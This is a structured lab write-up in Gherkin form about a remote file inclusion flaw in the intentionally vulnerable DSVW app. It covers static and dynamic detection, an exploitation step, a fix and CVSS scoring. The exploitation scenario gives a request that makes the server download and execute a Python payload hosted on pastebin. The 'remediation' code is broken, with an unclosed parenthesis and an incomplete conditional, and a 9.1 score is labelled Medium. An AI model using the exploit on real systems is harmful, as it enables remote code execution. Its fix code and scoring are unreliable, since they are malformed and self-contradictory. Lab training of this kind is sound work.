## Version 1.4.1
## language: en

Feature:
  TOE:
    dsvw
  Category:
    File inclusion
  Location:
    http://127.0.0.1:65412/ - include (field)
  CWE:
    CWE-98: Improper Control of Filename for
    Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Verify if the site is vulnerable to Remote File Inclusion
  Recommendation:
    Variables should be sanitized and must work within their scope.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu          | 18.04.3 LTS |
    | Firefox         | 72.0.1      |
  TOE information:
    Given The site
    And The server is running BaseHTTP version 0.6
    And Python version 3.6.9
    And SQLite version 3

  Scenario: Normal use case
    Given The site with the "include" parameter
    When I try to access
    Then The site returns nothing
    And I think remote file inclusion is possible

  Scenario: Static detection
    Given The source code from "dsvw.py"
    When I search for the include statement inside the code
    """
    backup, sys.stdout, program, envs = sys.stdout, io.StringIO(),
    (open(params["include"], "rb") if not "://" in params["include"] else
    urllib.request.urlopen(params["include"])).read(),
    {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT":
    self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0],
    "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}

    exec(program, envs)
    """
    Then The parameter is concatenated inside the include
    And I have a File inclusion in general

  Scenario: Dynamic detection
    Given The search bar
    When I put a single word inside the search bar
    """
    http://127.0.0.1:65412/?include=word
    """
    Then the page returns the following error
    """
    [Errno 2] No such file or directory: 'word'
    """
    When I try put other url in the parameter
    """
    http://127.0.0.1:65412/?include=http://google.com
    """
    Then I see part of the Google's main page
    And I can conclude that include parameter is a possible attack vector

  Scenario: Exploitation
    Given The vulnerability
    And  A single Python exploit inside another page
    """
    http://pastebin.com/raw/6VyyNNhc
    """
    When I make the next request:
    """
    http://127.0.0.1:65412/?include=http://pastebin.com/raw.php?i=6VyyNNhc&cmd=ifconfig
    """
    Then I get the ifconfig information
    And I can incluide files remotely

  Scenario: Remediation
    Given The source code
    When I validate if the value of the variable is on web folder
    Then I add the next code in source
    """
    backup = sys.stdout
    sys.stdout = io.StringIO()
    program = (open(params["include"], "rb") if not "://" in params["include"] else
    "Error including the file"
    envs = {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT":
    self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0],
    "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}

    exec(program, envs)
    """
    When I re-run my exploit with the same request
    """
    http://127.0.0.1:65412/?include=http://pastebin.com/raw.php?i=6VyyNNhc&cmd=ifconfig
    """
    And the the site returns:
    """
    Error including the file
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      8.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.2/10 (High) - E:H/RL:O/RC:C/CR:H/IR:X/AR:X
    Environmental: Unique and relevant attributes to a specific user environment
      9.1/10 (Medium) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2020-01-15
